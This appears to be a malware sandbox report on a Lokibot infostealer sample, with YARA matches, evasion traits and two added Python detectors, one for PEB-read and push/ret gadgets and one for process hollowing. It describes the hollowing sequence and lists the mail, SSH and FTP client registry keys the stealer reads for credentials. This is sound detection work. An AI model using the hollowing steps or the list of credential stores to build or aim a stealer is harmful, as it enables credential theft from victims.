          Source: 1.0.kVijllv0Yl.exe.400000.6.raw.unpack, type: UNPACKEDPE | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 1.0.kVijllv0Yl.exe.400000.6.unpack, type: UNPACKEDPE | Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
          Source: 1.0.kVijllv0Yl.exe.400000.6.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
          Source: 1.0.kVijllv0Yl.exe.400000.6.unpack, type: UNPACKEDPE | Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 1.0.kVijllv0Yl.exe.400000.6.unpack, type: UNPACKEDPE | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.kVijllv0Yl.exe.1ade0000.3.raw.unpack, type: UNPACKEDPE | Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
          Source: 0.2.kVijllv0Yl.exe.1ade0000.3.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
          Source: 0.2.kVijllv0Yl.exe.1ade0000.3.raw.unpack, type: UNPACKEDPE | Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 0.2.kVijllv0Yl.exe.1ade0000.3.raw.unpack, type: UNPACKEDPE | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 1.0.kVijllv0Yl.exe.400000.4.unpack, type: UNPACKEDPE | Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
          Source: 1.0.kVijllv0Yl.exe.400000.4.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
          Source: 1.0.kVijllv0Yl.exe.400000.4.unpack, type: UNPACKEDPE | Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 1.0.kVijllv0Yl.exe.400000.4.unpack, type: UNPACKEDPE | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 1.0.kVijllv0Yl.exe.400000.9.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
          Source: 1.0.kVijllv0Yl.exe.400000.9.raw.unpack, type: UNPACKEDPE | Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 1.0.kVijllv0Yl.exe.400000.9.raw.unpack, type: UNPACKEDPE | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000000.350551294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
          Source: 00000001.00000000.350551294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 00000001.00000000.350551294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000000.346477507.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
          Source: 00000001.00000000.346477507.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 00000001.00000000.346477507.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000000.347539730.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
          Source: 00000001.00000000.347539730.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 00000001.00000000.347539730.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.361757781.000000001ADE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
          Source: 00000000.00000002.361757781.000000001ADE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
          Source: 00000000.00000002.361757781.000000001ADE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 00000000.00000002.361757781.000000001ADE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000000.349125284.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
          Source: 00000001.00000000.349125284.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 00000001.00000000.349125284.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.602834721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
          Source: 00000001.00000002.602834721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 00000001.00000002.602834721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeCode function: 0_2_00403225 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeCode function: 0_2_0040604C
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeCode function: 0_2_00404772
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeCode function: 0_2_021B0A17
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeCode function: 1_2_0040549C
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeCode function: 1_2_004029D4
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeCode function: String function: 0041219C appears 45 times
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeCode function: String function: 00405B6F appears 42 times
          Source: kVijllv0Yl.exe, 00000000.00000003.345017997.000000001B0CF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs kVijllv0Yl.exe
          Source: kVijllv0Yl.exe, 00000000.00000003.345626698.000000001AF36000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs kVijllv0Yl.exe
          Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\nsg69F4.tmp\xfmkprutvpn.dll 2F51361FFE7DC60A4088469A27E570F22CF655E87720D26626B4E257492739E9
          Source: kVijllv0Yl.exeVirustotal: Detection: 40%
          Source: kVijllv0Yl.exeReversingLabs: Detection: 47%
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeFile read: C:\Users\user\Desktop\kVijllv0Yl.exeJump to behavior
          Source: kVijllv0Yl.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknownProcess created: C:\Users\user\Desktop\kVijllv0Yl.exe "C:\Users\user\Desktop\kVijllv0Yl.exe"
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeProcess created: C:\Users\user\Desktop\kVijllv0Yl.exe "C:\Users\user\Desktop\kVijllv0Yl.exe"
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeProcess created: C:\Users\user\Desktop\kVijllv0Yl.exe "C:\Users\user\Desktop\kVijllv0Yl.exe"
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeCode function: 1_2_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges,
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\CryptoJump to behavior
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeFile created: C:\Users\user\AppData\Local\Temp\nsg69F2.tmpJump to behavior
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/6@35/2
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeCode function: 0_2_00402012 CoCreateInstance,MultiByteToWideChar,
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeCode function: 0_2_00404275 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeMutant created: \Sessions\1\BaseNamedObjects\8F9C4E9C79A3B52B3F739430
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook
          Source: Binary string: wntdll.pdbUGP source: kVijllv0Yl.exe, 00000000.00000003.343540799.000000001AE20000.00000004.00000800.00020000.00000000.sdmp, kVijllv0Yl.exe, 00000000.00000003.341251965.000000001AFB0000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: kVijllv0Yl.exe, 00000000.00000003.343540799.000000001AE20000.00000004.00000800.00020000.00000000.sdmp, kVijllv0Yl.exe, 00000000.00000003.341251965.000000001AFB0000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation

Source: Yara match | File source: 0.2.kVijllv0Yl.exe.1ade0000.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.0.kVijllv0Yl.exe.400000.9.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.0.kVijllv0Yl.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.0.kVijllv0Yl.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.kVijllv0Yl.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.kVijllv0Yl.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.0.kVijllv0Yl.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.0.kVijllv0Yl.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.0.kVijllv0Yl.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.0.kVijllv0Yl.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.0.kVijllv0Yl.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.kVijllv0Yl.exe.1ade0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.0.kVijllv0Yl.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.0.kVijllv0Yl.exe.400000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000001.00000000.350551294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000000.346477507.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000000.347539730.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.361757781.000000001ADE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000000.349125284.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.602834721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: kVijllv0Yl.exe PID: 2312, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: kVijllv0Yl.exe PID: 1292, type: MEMORYSTR
Source: C:\Users\user\Desktop\kVijllv0Yl.exe | Code function: 1_2_00402AC0 push eax; ret (2 occurrences)
Source: C:\Users\user\Desktop\kVijllv0Yl.exe | Code function: 0_2_00405DA3 GetModuleHandleA,LoadLibraryA,GetProcAddress,
Source: C:\Users\user\Desktop\kVijllv0Yl.exe | File created: C:\Users\user\AppData\Local\Temp\nsg69F4.tmp\xfmkprutvpn.dll
Source: C:\Users\user\Desktop\kVijllv0Yl.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\kVijllv0Yl.exe | Process information set: NOGPFAULTERRORBOX (115 occurrences)

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\kVijllv0Yl.exe | Evasive API call chain: GetPEB, DecisionNodes, ExitProcess
Source: C:\Users\user\Desktop\kVijllv0Yl.exe TID: 4216 | Thread sleep time: -240000s >= -30000s
Source: C:\Users\user\Desktop\kVijllv0Yl.exe | Code function: 0_2_00405D7C FindFirstFileA,FindClose,
Source: C:\Users\user\Desktop\kVijllv0Yl.exe | Code function: 0_2_004053AA CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
Source: C:\Users\user\Desktop\kVijllv0Yl.exe | Code function: 0_2_00402630 FindFirstFileA,
Source: C:\Users\user\Desktop\kVijllv0Yl.exe | Code function: 1_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,
Source: C:\Users\user\Desktop\kVijllv0Yl.exe | Thread delayed: delay time: 60000
Source: C:\Users\user\Desktop\kVijllv0Yl.exe | API call chain: ExitProcess graph end node (2 occurrences)
Source: C:\Users\user\Desktop\kVijllv0Yl.exe | Code function: 0_2_00405DA3 GetModuleHandleA,LoadLibraryA,GetProcAddress,
Source: C:\Users\user\Desktop\kVijllv0Yl.exe | Code function: 1_2_00402B7C GetProcessHeap,RtlAllocateHeap,
Source: C:\Users\user\Desktop\kVijllv0Yl.exe | Process token adjusted: Debug
Source: C:\Users\user\Desktop\kVijllv0Yl.exe | Code function: 0_2_021B0402 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\kVijllv0Yl.exe | Code function: 0_2_021B0616 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\kVijllv0Yl.exe | Code function: 0_2_021B0706 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\kVijllv0Yl.exe | Code function: 0_2_021B0744 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\kVijllv0Yl.exe | Code function: 0_2_021B06C7 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\kVijllv0Yl.exe | Code function: 1_2_0040317B mov eax, dword ptr fs:[00000030h]
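The `mov eax, dword ptr fs:[00000030h]` instructions listed above are the 32-bit way to fetch the PEB pointer without calling any API, which is what the "GetPEB, DecisionNodes, ExitProcess" chain consults before deciding whether to run at all; the `push eax; ret` pair flagged under Data Obfuscation is a hand-rolled indirect jump that hides the real target from static call-graph recovery. The scanner below is an added example, not code from the report or from the sample: it finds both encodings in a raw 32-bit x86 code blob so the same check can be run over a dumped region such as the `.sdmp` files listed here. The byte string it scans is constructed for the demonstration (a synthetic function that reads PEB offset 0x64, `NumberOfProcessors` in the 32-bit PEB, then ends in `push eax; ret`).

```python
"""Find direct PEB reads (mov r32, fs:[0x30]) and push/ret gadgets in a raw
32-bit x86 code blob. Added example; not the report's or the sample's code."""
import re
from dataclasses import dataclass
from typing import List

REG32 = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]

# mov eax, fs:[0x30] has a short form (64 A1 disp32) and a general form
# (64 8B /r disp32 with ModRM mod=00, rm=101); the class lists the ModRM
# byte for each destination register in the general form.
PEB_READ = re.compile(
    rb"\x64(?:\xA1|\x8B[\x05\x0D\x15\x1D\x25\x2D\x35\x3D])\x30\x00\x00\x00")
# push r32 (50..57) immediately followed by ret (C3): a jump to whatever the
# register holds. Two bytes is a weak signature on its own; see the note below.
PUSH_RET = re.compile(rb"[\x50-\x57]\xC3")


@dataclass(frozen=True)
class Hit:
    offset: int
    kind: str      # "peb_read" or "push_ret"
    disasm: str    # human-readable form of the matched bytes


def _peb_disasm(m: bytes) -> str:
    if m[1] == 0xA1:
        return "mov eax, dword ptr fs:[0x30]"
    reg = REG32[(m[2] >> 3) & 7]          # reg field of the ModRM byte
    return f"mov {reg}, dword ptr fs:[0x30]"


def scan(blob: bytes) -> List[Hit]:
    """Return every match in the blob, ordered by offset."""
    hits = [Hit(m.start(), "peb_read", _peb_disasm(m.group()))
            for m in PEB_READ.finditer(blob)]
    hits += [Hit(m.start(), "push_ret", f"push {REG32[m.group()[0] - 0x50]}; ret")
             for m in PUSH_RET.finditer(blob)]
    return sorted(hits, key=lambda h: h.offset)


# Constructed blob: reads PEB->NumberOfProcessors (offset 0x64 in the 32-bit
# PEB), compares it with 1, then ends in push eax; ret.
SAMPLE_BLOB = (
    b"\x55\x8B\xEC"                    # push ebp; mov ebp, esp
    b"\x64\xA1\x30\x00\x00\x00"        # mov eax, fs:[0x30]     (offset 3)
    b"\x8B\x40\x64"                    # mov eax, [eax+0x64]
    b"\x83\xF8\x01"                    # cmp eax, 1
    b"\x90\x90\x90\x90"                # nop x4
    b"\x64\x8B\x0D\x30\x00\x00\x00"    # mov ecx, fs:[0x30]     (offset 19)
    b"\x50\xC3"                        # push eax; ret          (offset 26)
)

if __name__ == "__main__":
    for h in scan(SAMPLE_BLOB):
        print(f"{h.offset:#06x}  {h.kind:9s}  {h.disasm}")
```

The `fs:[0x30]` pattern is specific enough to act on by itself; the two-byte `push reg; ret` pattern is not, since `50 C3` can occur inside data or straddle instruction boundaries, so treat a `push_ret` hit as a lead to confirm in a disassembler (the sandbox reports it per recovered function for that reason) rather than as a verdict.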

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\kVijllv0Yl.exe | Memory written: C:\Users\user\Desktop\kVijllv0Yl.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Desktop\kVijllv0Yl.exe | Process created: C:\Users\user\Desktop\kVijllv0Yl.exe "C:\Users\user\Desktop\kVijllv0Yl.exe"
Source: C:\Users\user\Desktop\kVijllv0Yl.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Users\user\Desktop\kVijllv0Yl.exe | Code function: 0_2_00405AA7 GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,
Source: C:\Users\user\Desktop\kVijllv0Yl.exe | Code function: 1_2_00406069 GetUserNameW,
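The first two lines of this section together are the footprint of process hollowing: the sample starts a second copy of itself and writes a buffer beginning with `4D5A` (the `MZ` header of a PE image) into that child at address 0x400000, the default 32-bit image base. In the usual sequence the child is created suspended, its original image is overwritten with the unpacked payload, the thread context is pointed at the new entry point and the thread is resumed. The detector below is an added example and not code from the report: it walks a constructed API trace in that shape and raises one finding per hollowed child. The PIDs 2312 and 1292 are the two sample processes the report lists; the `CREATE_SUSPENDED` flag, the `SetThreadContext` and the `ResumeThread` events are assumed for the example because the report does not show them.

```python
"""Flag process hollowing in an API trace: a parent writes a PE header (MZ)
into a child it created, typically suspended, then resumes it.
Added example; not the report's or the sample's code."""
from typing import Dict, List

CREATE_SUSPENDED = 0x00000004          # dwCreationFlags bit of CreateProcess

# Constructed trace. PIDs 2312/1292 are the sample's two processes from the
# report; the flag, SetThreadContext and ResumeThread rows are assumed.
TRACE = [
    {"pid": 2312, "api": "CreateProcessW", "flags": CREATE_SUSPENDED,
     "child_pid": 1292, "image": r"C:\Users\user\Desktop\kVijllv0Yl.exe"},
    {"pid": 2312, "api": "WriteProcessMemory", "target_pid": 1292,
     "address": 0x400000, "data_head": bytes.fromhex("4D5A9000")},
    {"pid": 2312, "api": "WriteProcessMemory", "target_pid": 1292,
     "address": 0x401000, "data_head": bytes.fromhex("558BEC83")},
    {"pid": 2312, "api": "SetThreadContext", "target_pid": 1292},
    {"pid": 2312, "api": "ResumeThread", "target_pid": 1292},
    # Benign noise: a parent writing non-PE data into a child it spawned.
    {"pid": 4000, "api": "CreateProcessW", "flags": 0,
     "child_pid": 4100, "image": r"C:\Windows\System32\notepad.exe"},
    {"pid": 4000, "api": "WriteProcessMemory", "target_pid": 4100,
     "address": 0x7FF0000, "data_head": bytes.fromhex("00000000")},
]


def detect_hollowing(trace: List[dict]) -> List[dict]:
    """Return one finding per child that receives an MZ header from the
    process that created it, annotated with the rest of the sequence."""
    children: Dict[int, dict] = {}        # child pid -> creation record
    findings: Dict[int, dict] = {}
    for ev in trace:
        api = ev["api"]
        if api in ("CreateProcessW", "CreateProcessA"):
            children[ev["child_pid"]] = {
                "parent": ev["pid"], "image": ev["image"],
                "suspended": bool(ev["flags"] & CREATE_SUSPENDED)}
        elif api == "WriteProcessMemory":
            tgt = ev["target_pid"]
            rec = children.get(tgt)
            # Only the creating parent writing a PE header counts; a write of
            # arbitrary data, or by an unrelated process, is left to other rules.
            if rec and rec["parent"] == ev["pid"] and ev["data_head"][:2] == b"MZ":
                findings.setdefault(tgt, {
                    "parent": rec["parent"], "child": tgt, "image": rec["image"],
                    "mz_address": ev["address"], "suspended": rec["suspended"],
                    "context_set": False, "resumed": False})
        elif api == "SetThreadContext" and ev["target_pid"] in findings:
            findings[ev["target_pid"]]["context_set"] = True
        elif api == "ResumeThread" and ev["target_pid"] in findings:
            findings[ev["target_pid"]]["resumed"] = True
    return list(findings.values())


if __name__ == "__main__":
    for f in detect_hollowing(TRACE):
        print(f"hollowing: {f['parent']} -> {f['child']} ({f['image']}) "
              f"MZ written at {f['mz_address']:#x}, suspended={f['suspended']}, "
              f"context_set={f['context_set']}, resumed={f['resumed']}")
```

The MZ write alone is the high-confidence signal; `suspended`, `context_set` and `resumed` are carried in the finding so an analyst can see how much of the classic sequence was observed, which matters when a trace is truncated or the loader uses a variant (for example mapping a section instead of `WriteProcessMemory`, which this rule would miss).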

Stealing of Sensitive Information

Source: Yara match | File source: Process Memory Space: kVijllv0Yl.exe PID: 1292, type: MEMORYSTR
Source: Yara match | File source: 1.0.kVijllv0Yl.exe.400000.9.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.0.kVijllv0Yl.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.0.kVijllv0Yl.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.kVijllv0Yl.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.kVijllv0Yl.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.0.kVijllv0Yl.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.0.kVijllv0Yl.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.0.kVijllv0Yl.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.0.kVijllv0Yl.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.0.kVijllv0Yl.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.kVijllv0Yl.exe.1ade0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.0.kVijllv0Yl.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.0.kVijllv0Yl.exe.400000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000001.00000000.350551294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000000.346477507.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000000.347539730.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.361757781.000000001ADE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000000.349125284.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.602834721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: kVijllv0Yl.exe PID: 2312, type: MEMORYSTR
Source: C:\Users\user\Desktop\kVijllv0Yl.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Users\user\Desktop\kVijllv0Yl.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
Source: C:\Users\user\Desktop\kVijllv0Yl.exe | Key opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions
Source: C:\Users\user\Desktop\kVijllv0Yl.exe | Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl
Source: C:\Users\user\Desktop\kVijllv0Yl.exe | Key opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts
Source: C:\Users\user\Desktop\kVijllv0Yl.exe | Key opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts
Source: C:\Users\user\Desktop\kVijllv0Yl.exe | Key opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings
Source: C:\Users\user\Desktop\kVijllv0Yl.exe | Key opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts
